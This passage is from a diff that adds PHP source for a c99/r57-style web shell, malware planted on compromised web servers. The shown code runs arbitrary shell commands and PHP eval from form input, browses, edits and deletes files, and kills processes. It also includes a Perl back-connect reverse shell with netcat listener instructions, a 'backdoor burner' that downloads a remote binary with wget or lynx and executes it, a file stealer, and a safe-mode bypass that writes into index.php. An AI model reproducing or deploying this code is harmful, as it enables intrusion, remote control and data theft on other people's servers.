+		cf($act.'.exe', $$act);
+		$cmd = $act.'.exe';
+		$act = 'cmd';
+		$cmd_txt = '1';
+	}else{
+		echo 'Directory Is Not Writable!<br>';
+	}
+}
+if ($act == "cmd") 
+{
+if (trim($cmd) == "ps -aux") {$act = "processes";} 
+elseif (trim($cmd) == "tasklist") {$act = "processes";} 
+else 
+{ 
+ @chdir($chdir); 
+ if (!empty($submit)) 
+ { 
+  echo "<b>Result of execution this command</b>:<br>"; 
+  $olddir = realpath("."); 
+  @chdir($d); 
+  $ret = myshellexec($cmd); 
+  $ret = convert_cyr_string($ret,"d","w"); 
+  if ($cmd_txt) 
+  { 
+   $rows = count(explode("\r\n",$ret))+1; 
+   if ($rows < 10) {$rows = 10;} 
+   echo "<br><textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>"; 
+  } 
+  else {echo $ret."<br>";} 
+  @chdir($olddir); 
+ } 
+ else {echo "<b>Execution command</b>"; if (empty($cmd_txt)) {$cmd_txt = TRUE;}} 
+ echo "<form action=\"".$surl."\" method=POST><input type=hidden name=act value=cmd><textarea name=cmd cols=122 rows=10>".htmlspecialchars($cmd)."</textarea><input type=hidden name=\"d\" value=\"".$dispd."\"><br><br><input type=submit name=submit value=\"Execute\">&nbsp;Display in text-area&nbsp;<input type=\"checkbox\" name=\"cmd_txt\" value=\"1\""; if ($cmd_txt) {echo " checked";} echo "></form>"; 
+} 
+} 
+if ($act == 'ls')
+{ 
+ if (count($ls_arr) > 0) {$list = $ls_arr;} 
+ else 
+ { 
+  $list = array(); 
+  if ($h = @opendir($d))
+  { 
+   while (($o = readdir($h)) !== FALSE) {$list[] = $d.$o;} 
+   closedir($h); 
+  } 
+  else {} 
+ } 
+ if (count($list) == 0) {echo "<center><b>Can't open folder (".htmlspecialchars($d).")!</b></center>";} 
+ else 
+ { 
+  //Building array 
+  $objects = array(); 
+  $vd = "f"; //Viewing mode 
+  if ($vd == "f") 
+  { 
+   $objects["head"] = array(); 
+   $objects["folders"] = array(); 
+   $objects["links"] = array(); 
+   $objects["files"] = array(); 
+   foreach ($list as $v) 
+   { 
+    $o = basename($v); 
+    $row = array(); 
+    if ($o == ".") {$row[] = $d.$o; $row[] = "LINK";} 
+    elseif ($o == "..") {$row[] = $d.$o; $row[] = "LINK";} 
+    elseif (is_dir($v)) 
+    { 
+     if (is_link($v)) {$type = "LINK";} 
+     else {$type = "DIR";} 
+     $row[] = $v; 
+     $row[] = $type; 
+    } 
+    elseif(is_file($v)) {$row[] = $v; $row[] = filesize($v);} 
+    $row[] = filemtime($v); 
+    if (!$win) 
+    { 
+     $ow = posix_getpwuid(fileowner($v)); 
+     $gr = posix_getgrgid(filegroup($v)); 
+     $row[] = ($ow["name"]?$ow["name"]:fileowner($v))."/".($gr["name"]?$gr["name"]:filegroup($v)); 
+    } 
+    $row[] = fileperms($v); 
+    if (($o == ".") or ($o == "..")) {$objects["head"][] = $row;} 
+    elseif (is_link($v)) {$objects["links"][] = $row;} 
+    elseif (is_dir($v)) {$objects["folders"][] = $row;} 
+    elseif (is_file($v)) {$objects["files"][] = $row;} 
+    $i++; 
+   } 
+   $row = array(); 
+   $row[] = '<b>Name</b>';
+   $row[] = '<b>Size</b>';
+   $row[] = '<b>Modify</b>';
+   if (!$win)
+	$row[] = '<b>Owner/Group</b>';
+   $row[] = '<b>Perms</b>';
+   $row[] = '<b>Action</b>';
+   $parsesort = parsesort($sort); 
+   $sort = $parsesort[0].$parsesort[1]; 
+   $k = $parsesort[0]; 
+   if ($parsesort[1] != "a") {$parsesort[1] = "d";} 
+   $y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$k.($parsesort[1] == "a"?"d":"a")."\">"; 
+   $y .= "<img src=\"".$surl."act=img&img=sort_".($sort[1] == "a"?"asc":"desc")."\" height=\"9\" width=\"14\" alt=\"".($parsesort[1] == "a"?"Asc.":"Desc")."\" border=\"0\"></a>"; 
+   $row[$k] .= $y; 
+   for($i=0;$i<count($row)-1;$i++) 
+   { 
+    if ($i != $k) {$row[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$i.$parsesort[1]."\">".$row[$i]."</a>";} 
+   } 
+   $v = $parsesort[0]; 
+   usort($objects["folders"], "tabsort"); 
+   usort($objects["links"], "tabsort"); 
+   usort($objects["files"], "tabsort"); 
+   if ($parsesort[1] == "d") 
+   { 
+    $objects["folders"] = array_reverse($objects["folders"]); 
+    $objects["files"] = array_reverse($objects["files"]); 
+   } 
+   $objects = array_merge($objects["head"],$objects["folders"],$objects["links"],$objects["files"]); 
+   $tab = array(); 
+   $tab["cols"] = array($row); 
+   $tab["head"] = array(); 
+   $tab["folders"] = array(); 
+   $tab["links"] = array(); 
+   $tab["files"] = array(); 
+   $i = 0; 
+   foreach ($objects as $a) 
+   { 
+    $v = $a[0]; 
+    $o = basename($v); 
+    $dir = dirname($v); 
+    if ($disp_fullpath) {$disppath = $v;} 
+    else {$disppath = $o;} 
+    $disppath = str2mini($disppath,60); 
+    if (in_array($v,$sess_data["cut"])) {$disppath = "<strike>".$disppath."</strike>";} 
+    elseif (in_array($v,$sess_data["copy"])) {$disppath = "<u>".$disppath."</u>";} 
+    foreach ($regxp_highlight as $r) 
+    { 
+     if (ereg($r[0],$o)) 
+     { 
+      if ((!is_numeric($r[1])) or ($r[1] > 3)) {$r[1] = 0; ob_clean(); echo "Warning! Configuration error in \$regxp_highlight[".$k."][0] - unknown command."; c99shexit();} 
+      else 
+      { 
+       $r[1] = round($r[1]); 
+       $isdir = is_dir($v); 
+       if (($r[1] == 0) or (($r[1] == 1) and !$isdir) or (($r[1] == 2) and !$isdir)) 
+       { 
+        if (empty($r[2])) {$r[2] = "<b>"; $r[3] = "</b>";} 
+        $disppath = $r[2].$disppath.$r[3]; 
+        if ($r[4]) {break;} 
+       } 
+      } 
+     } 
+    } 
+    $uo = urlencode($o); 
+    $ud = urlencode($dir); 
+    $uv = urlencode($v); 
+    $row = array(); 
+    if ($o == ".") 
+    { 
+     $row[] = "<img src=\"".$surl."act=img&img=small_dir\" height=\"16\" width=\"19\" border=\"0\">&nbsp;<a href=\"".$surl."act=".$dspact."&d=".urlencode(realpath($d.$o))."&sort=".$sort."\">".$o."</a>"; 
+     $row[] = "LINK"; 
+    } 
+    elseif ($o == "..") 
+    { 
+     $row[] = "<img src=\"".$surl."act=img&img=ext_lnk\" height=\"16\" width=\"19\" border=\"0\">&nbsp;<a href=\"".$surl."act=".$dspact."&d=".urlencode(realpath($d.$o))."&sort=".$sort."\">".$o."</a>"; 
+     $row[] = "LINK"; 
+    } 
+    elseif (is_dir($v)) 
+    { 
+     if (is_link($v)) 
+     { 
+      $disppath .= " => ".readlink($v); 
+      $type = "LINK"; 
+      $row[] =  "<img src=\"".$surl."act=img&img=ext_lnk\" height=\"16\" width=\"16\" border=\"0\">&nbsp;<a href=\"".$surl."act=ls&d=".$uv."&sort=".$sort."\">[".$disppath."]</a>"; 
+     } 
+     else 
+     { 
+      $type = "DIR"; 
+      $row[] =  "<img src=\"".$surl."act=img&img=small_dir\" height=\"16\" width=\"19\" border=\"0\">&nbsp;<a href=\"".$surl."act=ls&d=".$uv."&sort=".$sort."\">[".$disppath."]</a>"; 
+      } 
+     $row[] = $type; 
+    } 
+    elseif(is_file($v)) 
+    { 
+     $ext = explode(".",$o); 
+     $c = count($ext)-1; 
+     $ext = $ext[$c]; 
+     $ext = strtolower($ext); 
+     $row[] =  "<img src=\"".$surl."act=img&img=ext_".$ext."\" border=\"0\">&nbsp;<a href=\"".$surl."act=f&f=".$uo."&d=".$ud."&\">".$disppath."</a>"; 
+     $row[] = view_size($a[1]); 
+    } 
+    $row[] = date("d.m.Y H:i:s",$a[2]); 
+    if (!$win) {$row[] = $a[3];} 
+    $row[] = "<a href=\"".$surl."act=chmod&f=".$uo."&d=".$ud."\"><b>".view_perms_color($v)."</b></a>"; 
+    if ($o == ".") {$checkbox = "<input type=\"checkbox\" name=\"actbox[]\" onclick=\"ls_reverse_all();\">"; $i--;} 
+    else {$checkbox = "<input type=\"checkbox\" name=\"actbox[]\" id=\"actbox".$i."\" value=\"".htmlspecialchars($v)."\">";} 
+    if (is_dir($v)) {$row[] = "<a href=\"".$surl."act=d&d=".$uv."\"><img src=\"".$surl."act=img&img=ext_diz\" alt=\"Info\" height=\"16\" width=\"16\" border=\"0\"></a>&nbsp;".$checkbox;} 
+    else {$row[] = "<a href=\"".$surl."act=f&f=".$uo."&ft=info&d=".$ud."\"><img src=\"".$surl."act=img&img=ext_diz\" alt=\"Info\" height=\"16\" width=\"16\" border=\"0\"></a>&nbsp;<a href=\"".$surl."act=f&f=".$uo."&ft=edit&d=".$ud."\"><img src=\"".$surl."act=img&img=change\" alt=\"Change\" height=\"16\" width=\"19\" border=\"0\"></a>&nbsp;<a href=\"".$surl."act=f&f=".$uo."&ft=download&d=".$ud."\"><img src=\"".$surl."act=img&img=download\" alt=\"Download\" height=\"16\" width=\"19\" border=\"0\"></a>&nbsp;".$checkbox;} 
+    if (($o == ".") or ($o == "..")) {$tab["head"][] = $row;} 
+    elseif (is_link($v)) {$tab["links"][] = $row;} 
+    elseif (is_dir($v)) {$tab["folders"][] = $row;} 
+    elseif (is_file($v)) {$tab["files"][] = $row;} 
+    $i++; 
+   } 
+  } 
+  // Compiling table 
+  $table = array_merge($tab["cols"],$tab["head"],$tab["folders"],$tab["links"],$tab["files"]); 
+  echo "<center><b>Listing folder (".count($tab["files"])." files and ".(count($tab["folders"])+count($tab["links"]))." folders):</b></center><br><TABLE cellSpacing=0 cellPadding=0 width=100% bgcolor=#000000 borderColorLight=#433333 border=0><form action=\"".$surl."\" method=POST name=\"ls_form\"><input type=hidden name=act value=".$dspact.'><input type=hidden name=d value="'.$dispd.'">';
+  $countrows = 0;
+  foreach($table as $row) 
+  { 
+   if ($countrows & 1) {
+   echo "<tr bgcolor=#111111>\r\n"; 
+   } else {
+   echo "<tr>\r\n";
+   }
+   ++$countrows;
+   foreach($row as $v) {echo "<td>".$v."</td>\r\n";} 
+   echo "</tr>\r\n"; 
+  } 
+  echo "</table><hr size=\"1\" noshade><p align=\"right\"> 
+  <script> 
+  function ls_setcheckboxall(status) 
+  { 
+   var id = 1; 
+   var num = ".(count($table)-2)."; 
+   while (id <= num) 
+   { 
+    document.getElementById('actbox'+id).checked = status; 
+    id++; 
+   } 
+  } 
+  function ls_reverse_all() 
+  { 
+   var id = 1; 
+   var num = ".(count($table)-2)."; 
+   while (id <= num) 
+   { 
+    document.getElementById('actbox'+id).checked = !document.getElementById('actbox'+id).checked; 
+    id++; 
+   } 
+  } 
+  </script> 
+  <input type=\"button\" onclick=\"ls_setcheckboxall(true);\" value=\"Select all\">&nbsp;&nbsp;<input type=\"button\" onclick=\"ls_setcheckboxall(false);\" value=\"Unselect all\">  
+  <b><img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\">"; 
+  if (count(array_merge($sess_data["copy"],$sess_data["cut"])) > 0 and ($usefsbuff)) 
+  { 
+   echo "<input type=submit name=actarcbuff value=\"Pack buffer to archive\">&nbsp;<input type=\"text\" name=\"actarcbuff_path\" value=\"archive_".substr(md5(rand(1,1000).rand(1,1000)),0,5).".tar.gz\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=submit name=\"actpastebuff\" value=\"Paste\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=submit name=\"actemptybuff\" value=\"Empty buffer\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;"; 
+  } 
+  echo "<select name=act><option value=\"".$act."\">With selected:</option>"; 
+  echo "<option value=delete".($dspact == "delete"?" selected":"").">Delete</option>"; 
+  echo "<option value=chmod".($dspact == "chmod"?" selected":"").">Change-mode</option>"; 
+  echo "<option value=md5file".($dspact == "md5file"?" selected":"").">MD5 Checksum</option>"; 
+  echo "<option value=sha1file".($dspact == "sha1file"?" selected":"").">SHA1 Checksum</option>"; 
+  if ($usefsbuff) 
+  { 
+   echo "<option value=cut".($dspact == "cut"?" selected":"").">Cut</option>"; 
+   echo "<option value=copy".($dspact == "copy"?" selected":"").">Copy</option>"; 
+   echo '<option value=unselect'.($dspact == "unselect"?" selected":"").'>Unselect</option>';
+  } 
+  echo '</select> <input type=submit value="Confirm"></p></form>';
+ } 
+} 
+if ($act == 'tools') 
+{ 
+?>
+<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="116" width="100%" bgcolor=#000000 borderColorLight=#c0c0c0 border=1>
+<tr><td height=1 valign=top colspan=2><center><b>:: Bind Functions By r57 ::</b></center>
+</td></tr>
+<tr><td width=50% height=83 valign=top>
+<center>
+<form action="<?php echo $surl; ?>">
+<b>Bind With Backd00r Burner</b><br>
+<form action="<?php echo $surl; ?>"><input type=hidden name=act value=tools>
+<br>
+<select size=1 name="dolma"><option value="wgetcan">Use Wget</option><option value="lynxcan">Use lynx -dump</option><option value="freadcan">Use Fread</option></select> <input type=submit value="Burn it Baby"></form>
+</td><td width=50% height=83 valign=top>
+<center>
+<b>Back-Connection</b>
+<br><br>
+<form name=form method=POST>Host:<input type=text name=backconnectip size=15 value=<?php echo $ip;?>> Port: <input type=text name=backconnectport size=15 value=5992><br>
+Use: <select size=1 name=use><option value=Perl>Perl</option><option value=C>C</option></select> <input type=submit name=submit value=Connect></form>
+First, run NetCat on your computer using '<b>nc -l -n -v -p <?php echo $bc_port; ?></b>'.<br>
+Then, click "Connect" once the port is listening.
+</center>
+</td></tr>
+</table>
+<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="116" width="100%" bgcolor=#000000 borderColorLight=#c0c0c0 border=1>
+<tr><td height=1 valign=top colspan=2><center><b>:: File Stealer Function Ripped From Tontonq's File Stealer ::</b></center></td></tr>
+<tr>
+  <td width=50% height=83 valign=top>
+    <center><b>Safe-Mode Bypass</b>
+    <form action="<?php echo $surl; ?>" method=POST>
+    <input type=hidden name=act value=tools>
+    <textarea name="erorr" cols=100 rows=10></textarea></br>
+    <input type="text" name="nere" value="<?echo $real.'index.php';?> "size=84>
+    <input type="submit" value="Write to File">
+    
+    </form>
+    </center>
+    </td>
+  <td width=50% height=83 valign=top>
+   <center>
+   <form action="<?php echo $surl; ?>" method=POST>
+   <input type=hidden name=act value=tools>
+   Dosyanin Adresi ? = <input type=text name=dosyaa size=81 maxlength=500><br><br> 
+Nereya Kaydolcak? = <input type="text" name="yeniyer" size=81 maxlength=191 value="<?php echo $real.'sploitz.zip'; ?>"><br><br> 
+<input type=submit class='stealthSubmit' Value='Dosyayi Chek'> 
+</form>
+</center>
+</td></tr>
+</table>
+<?php 
+
+if (isset($_POST['dosyaa']))
+{
+dosyayicek($_POST['dosyaa'],$_POST['yeniyer']);
+
+}
+if (!empty($_GET['ipi']) && !empty($_GET['pipi'])) 
+{ 
+ cf("/tmp/back",$back_connect); 
+ $p2=which("perl"); 
+ $blah = ex($p2." /tmp/back ".$_GET['ipi']." ".$_GET['pipi']." &"); 
+echo"<b>Now script try connect to ".$_GET['ipi']." port ".$_GET['pipi']." ...</b>"; 
+} 
+if (!empty($_GET['dolma'])) 
+{  
+$sayko=htmlspecialchars($_GET['dolma']); 
+if ($sayko == "wgetcan") 
+{ 
+
+myshellexec("wget $adires -O sayko_bind;chmod 777 sayko_bind;./sayko_bind"); 
+
+
+} 
+
+else if ($sayko =="freadcan") 
+{ 
+dosyayicek($adires,"sayko_bind");
+myshellexec("./sayko_bind");
+} 
+
+else if ($sayko == "lynxcan") 
+{ 
+myshellexec("lynx -dump $adires > sayko_bind;chmod 777 sayko_bind;./sayko_bind"); 
+
+} 
+
+
+
+
+
+} 
+
+if  (!empty($_POST['erorr'])) 
+{
+
+
+
+error_log($_POST['erorr'], 3, "php://".$_POST['nere']);
+
+
+
+}
+
+
+
+
+
+
+
+
+
+} 
+if ($act == "processes") 
+{ 
+ echo "<b>Processes:</b><br>"; 
+ if (!$win) {$handler = "ps -aux".($grep?" | grep '".addslashes($grep)."'":"");} 
+ else {$handler = "tasklist";} 
+ $ret = myshellexec($handler); 
+ if (!$ret) {echo "Can't execute \"".$handler."\"!";} 
+ else 
+ { 
+  if (empty($processes_sort)) {$processes_sort = $sort_default;} 
+  $parsesort = parsesort($processes_sort); 
+  if (!is_numeric($parsesort[0])) {$parsesort[0] = 0;} 
+  $k = $parsesort[0]; 
+  if ($parsesort[1] != "a") {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."a\"><img src=\"".$surl."act=img&img=sort_desc\" height=\"9\" width=\"14\" border=\"0\"></a>";} 
+  else {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."d\"><img src=\"".$surl."act=img&img=sort_asc\" height=\"9\" width=\"14\" border=\"0\"></a>";} 
+  $ret = htmlspecialchars($ret); 
+  if (!$win) 
+  { 
+   if ($pid) 
+   { 
+    if (is_null($sig)) {$sig = 9;} 
+    echo "Sending signal ".$sig." to #".$pid."... "; 
+    if (posix_kill($pid,$sig)) {echo "OK.";} 
+    else {echo "ERROR.";} 
+   } 
+   while (ereg("  ",$ret)) {$ret = str_replace("  "," ",$ret);} 
+   $stack = explode("\n",$ret); 
+   $head = explode(" ",$stack[0]); 
+   unset($stack[0]); 
+   for($i=0;$i<count($head);$i++) 
+   { 
+    if ($i != $k) {$head[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$i.$parsesort[1]."\"><b>".$head[$i]."</b></a>";} 
+   } 
+   $prcs = array(); 
+   foreach ($stack as $line) 
+   { 
+    if (!empty($line)) 
+{ 
+ echo "<tr>"; 
+     $line = explode(" ",$line); 
+     $line[10] = join(" ",array_slice($line,10)); 
+     $line = array_slice($line,0,11); 
+     if ($line[0] == get_current_user()) {$line[0] = "<font color=green>".$line[0]."</font>";} 
+     $line[] = "<a href=\"".$surl."act=processes&d=".urlencode($d)."&pid=".$line[1]."&sig=9\"><u>KILL</u></a>"; 
+     $prcs[] = $line; 
+     echo "</tr>"; 
+    } 
+   } 
+  } 
+  else 
+  { 
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);} 
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);} 
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);} 
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);} 
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);} 
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);} 
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);} 
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);} 
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);} 
+   while (ereg("",$ret)) {$ret = str_replace("","",$ret);} 
+   while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} 
+   $ret = convert_cyr_string($ret,"d","w"); 
+   $stack = explode("\n",$ret); 
+   unset($stack[0],$stack[2]); 
+   $stack = array_values($stack); 
+   $head = explode("",$stack[0]); 
+   $head[1] = explode(" ",$head[1]); 
+   $head[1] = $head[1][0]; 
+   $stack = array_slice($stack,1); 
+   unset($head[2]); 
+   $head = array_values($head); 
+   if ($parsesort[1] != "a") {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."a\"><img src=\"".$surl."act=img&img=sort_desc\" height=\"9\" width=\"14\" border=\"0\"></a>";} 
+   else {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."d\"><img src=\"".$surl."act=img&img=sort_asc\" height=\"9\" width=\"14\" border=\"0\"></a>";} 
+   if ($k > count($head)) {$k = count($head)-1;} 
+   for($i=0;$i<count($head);$i++) 
+   { 
+    if ($i != $k) {$head[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$i.$parsesort[1]."\"><b>".trim($head[$i])."</b></a>";} 
+   } 
+   $prcs = array(); 
+   foreach ($stack as $line) 
+   { 
+    if (!empty($line)) 
+    { 
+     echo "<tr>"; 
+     $line = explode("",$line); 
+     $line[1] = intval($line[1]); $line[2] = $line[3]; unset($line[3]); 
+     $line[2] = intval(str_replace(" ","",$line[2]))*1024;  
+     $prcs[] = $line; 
+     echo "</tr>"; 
+    } 
+   } 
+  } 
+  $head[$k] = "<b>".$head[$k]."</b>".$y; 
+  $v = $processes_sort[0]; 
+  usort($prcs,"tabsort"); 
+  if ($processes_sort[1] == "d") {$prcs = array_reverse($prcs);} 
+  $tab = array(); 
+  $tab[] = $head; 
+  $tab = array_merge($tab,$prcs); 
+  echo "<TABLE height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgcolor=#000000 borderColorLight=#c0c0c0 border=1 bordercolor=\"#C0C0C0\">"; 
+  foreach($tab as $i=>$k) 
+  { 
+   echo "<tr>"; 
+   foreach($k as $j=>$v) {if ($win and $i > 0 and $j == 2) {$v = view_size($v);} echo "<td>".$v."</td>";} 
+   echo "</tr>"; 
+  } 
+  echo "</table>"; 
+ } 
+} 
+if ($act == "eval") 
+{ 
+ if (!empty($eval)) 
+ { 
+  echo "<b>Result of execution this PHP-code</b>:<br>"; 
+  $tmp = ob_get_contents(); 
+  $olddir = realpath("."); 
+  @chdir($d); 
+  if ($tmp) 
+  { 
+   ob_clean(); 
+   eval($eval); 
+   $ret = ob_get_contents(); 
+   $ret = convert_cyr_string($ret,"d","w"); 
+   ob_clean(); 
+   echo $tmp; 
+   if ($eval_txt) 
+   { 
+    $rows = count(explode("\r\n",$ret))+1; 
+    if ($rows < 10) {$rows = 10;} 
+    echo "<br><textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>"; 
+   } 
+   else {echo $ret."<br>";} 
+  } 
+  else 
+  { 
+   if ($eval_txt) 
+   { 
+    echo "<br><textarea cols=\"122\" rows=\"15\" readonly>"; 
+    eval($eval); 
+    echo "</textarea>"; 
+   } 
+   else {echo $ret;} 
+  } 
+  @chdir($olddir); 
+ } 
+ else {echo "<b>Execution PHP-code</b>"; if (empty($eval_txt)) {$eval_txt = TRUE;}} 
+ echo "<form action=\"".$surl."\" method=POST><input type=hidden name=act value=eval><textarea name=\"eval\" cols=\"122\" rows=\"10\">".htmlspecialchars($eval)."</textarea><input type=hidden name=\"d\" value=\"".$dispd."\"><br><br><input type=submit value=\"Execute\">&nbsp;Display in text-area&nbsp;<input type=\"checkbox\" name=\"eval_txt\" value=\"1\""; if ($eval_txt) {echo " checked";} echo "></form>"; 
+} 
+if ($act == "f") 
+{ 
+ if ((!is_readable($d.$f) or is_dir($d.$f)) and $ft != "edit") 
+ { 
+  if (file_exists($d.$f)) {echo "<center><b>Permision denied (".htmlspecialchars($d.$f).")!</b></center>";} 
+  else {echo "<center><b>File does not exists (".htmlspecialchars($d.$f).")!</b><br><a href=\"".$surl."act=f&f=".urlencode($f)."&ft=edit&d=".urlencode($d)."&c=1\"><u>Create</u></a></center>";} 
+ } 
+ else 
+ { 
+  $r = @file_get_contents($d.$f); 
+  $ext = explode(".",$f); 
+  $c = count($ext)-1; 
+  $ext = $ext[$c]; 
+  $ext = strtolower($ext); 
+  $rft = ""; 
+  foreach($ftypes as $k=>$v) {if (in_array($ext,$v)) {$rft = $k; break;}} 
+  if (eregi("sess_(.*)",$f)) {$rft = "phpsess";} 
+  if (empty($ft)) {$ft = $rft;} 
+  $arr = array( 
+   array("<img src=\"".$surl."act=img&img=ext_diz\" border=\"0\">","info"), 
+   array("<img src=\"".$surl."act=img&img=ext_html\" border=\"0\">","html"), 
+   array("<img src=\"".$surl."act=img&img=ext_txt\" border=\"0\">","txt"), 
+   array("Code","code"), 
+   array("Session","phpsess"), 
+   array("<img src=\"".$surl."act=img&img=ext_exe\" border=\"0\">","exe"), 
+   array("SDB","sdb"), 
+   array("<img src=\"".$surl."act=img&img=ext_gif\" border=\"0\">","img"), 
+   array("<img src=\"".$surl."act=img&img=ext_ini\" border=\"0\">","ini"), 
+   array("<img src=\"".$surl."act=img&img=download\" border=\"0\">","download"), 
+   array("<img src=\"".$surl."act=img&img=ext_rtf\" border=\"0\">","notepad"), 
+   array("<img src=\"".$surl."act=img&img=change\" border=\"0\">","edit") 
+  ); 
+  echo "<b>Viewing file:&nbsp;&nbsp;&nbsp;&nbsp;<img src=\"".$surl."act=img&img=ext_".$ext."\" border=\"0\">&nbsp;".$f." (".view_size(filesize($d.$f)).") &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;".view_perms_color($d.$f)."</b><br>Select action/file-type:<br>"; 
+  foreach($arr as $t) 
+  { 
+   if ($t[1] == $rft) {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><font color=green>".$t[0]."</font></a>";} 
+   elseif ($t[1] == $ft) {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><b><u>".$t[0]."</u></b></a>";} 
+   else {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><b>".$t[0]."</b></a>";} 
+   echo " (<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&white=1&d=".urlencode($d)."\" target=\"_blank\">+</a>) |"; 
+  } 
+  echo "<hr size=\"1\" noshade>"; 
+  if ($ft == "info") 
+  { 
+   echo "<b>Information:</b><table border=0 cellspacing=1 cellpadding=2><tr><td><b>Path</b></td><td> ".$d.$f."</td></tr><tr><td><b>Size</b></td><td> ".view_size(filesize($d.$f))."</td></tr><tr><td><b>MD5</b></td><td> ".md5_file($d.$f)."</td></tr>"; 
+   if (!$win) 
+   { 
+    echo "<tr><td><b>Owner/Group</b></td><td> ";     
+    $ow = posix_getpwuid(fileowner($d.$f)); 
+    $gr = posix_getgrgid(filegroup($d.$f)); 
+    echo ($ow["name"]?$ow["name"]:fileowner($d.$f))."/".($gr["name"]?$gr["name"]:filegroup($d.$f)); 
+   } 
+   echo "<tr><td><b>Perms</b></td><td><a href=\"".$surl."act=chmod&f=".urlencode($f)."&d=".urlencode($d)."\">".view_perms_color($d.$f)."</a></td></tr><tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d.$f))."</td></tr><tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d.$f))."</td></tr><tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d.$f))."</td></tr></table><br>"; 
+   $fi = fopen($d.$f,"rb"); 
+   if ($fi) 
+   { 
+    if ($fullhexdump) {echo "<b>FULL HEXDUMP</b>"; $str = fread($fi,filesize($d.$f));} 
+    else {echo "<b>HEXDUMP PREVIEW</b>"; $str = fread($fi,$hexdump_lines*$hexdump_rows);} 
+    $n = 0; 
+    $a0 = "00000000<br>"; 
+    $a1 = ""; 
+    $a2 = ""; 
+    for ($i=0; $i<strlen($str); $i++) 
+    { 
+     $a1 .= sprintf("%02X",ord($str[$i]))." "; 
+     switch (ord($str[$i])) 
+     { 
+      case 0:  $a2 .= "<font>0</font>"; break; 
+      case 32: 
+      case 10: 
+      case 13: $a2 .= "&nbsp;"; break; 
+      default: $a2 .= htmlspecialchars($str[$i]); 
+     } 
+     $n++; 
+     if ($n == $hexdump_rows) 
+     { 
+      $n = 0; 
+      if ($i+1 < strlen($str)) {$a0 .= sprintf("%08X",$i+1)."<br>";} 
+      $a1 .= "<br>"; 
+      $a2 .= "<br>"; 
+     } 
+    } 
+    //if ($a1 != "") {$a0 .= sprintf("%08X",$i)."<br>";} 
+    echo "<table border=0 bgcolor=#666666 cellspacing=1 cellpadding=4><tr><td bgcolor=#666666>".$a0."</td><td bgcolor=000000>".$a1."</td><td bgcolor=000000>".$a2."</td></tr></table><br>"; 
+   } 
+   $encoded = ""; 
+   if ($base64 == 1) 
+   { 
+    echo "<b>Base64 Encode</b><br>"; 
+    $encoded = base64_encode(file_get_contents($d.$f)); 
+   } 
+   elseif($base64 == 2) 
+   { 
+    echo "<b>Base64 Encode + Chunk</b><br>"; 
+    $encoded = chunk_split(base64_encode(file_get_contents($d.$f))); 
+   } 
+   elseif($base64 == 3) 
+   { 
+    echo "<b>Base64 Encode + Chunk + Quotes</b><br>"; 
+    $encoded = base64_encode(file_get_contents($d.$f)); 
+    $encoded = substr(preg_replace("!.{1,76}!","'\\0'.\n",$encoded),0,-2); 
+   } 
+   elseif($base64 == 4) 
+   { 
+    $text = file_get_contents($d.$f); 
+    $encoded = base64_decode($text); 
+    echo "<b>Base64 Decode"; 
+    if (base64_encode($encoded) != $text) {echo " (failed)";} 
+    echo "</b><br>"; 
+   } 
+   if (!empty($encoded)) 
+   { 
+    echo "<textarea cols=80 rows=10>".htmlspecialchars($encoded)."</textarea><br><br>"; 
+   } 
+   echo "<b>HEXDUMP:</b><nobr> [<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&fullhexdump=1&d=".urlencode($d)."\">Full</a>] [<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&d=".urlencode($d)."\">Preview</a>]<br><b>Base64: </b> 
+<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=1&d=".urlencode($d)."\">Encode</a>]&nbsp;</nobr> 
+<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=2&d=".urlencode($d)."\">+chunk</a>]&nbsp;</nobr> 
